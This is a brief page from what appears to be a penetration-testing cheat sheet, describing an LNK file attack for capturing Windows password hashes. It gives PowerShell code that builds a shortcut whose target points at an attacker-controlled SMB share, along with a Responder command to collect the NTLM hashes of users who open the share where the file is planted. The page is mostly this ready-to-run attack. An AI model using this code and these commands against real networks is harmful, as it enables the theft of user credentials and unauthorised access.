LNK File Attacks

Places a malicious file in a shared folder that can lead to capturing hashes through responder

LNK File Creation

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\IP_ADDRESS_ATTACKER\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Start responder sudo Responder.py -I eth0 -dPv
Navigate to the share and you should receive captured hashed in responder
Note: Make sure SMB is turned ON in responder.conf

PreviousKerberoasting NextMimikatz

Last updated 5 months ago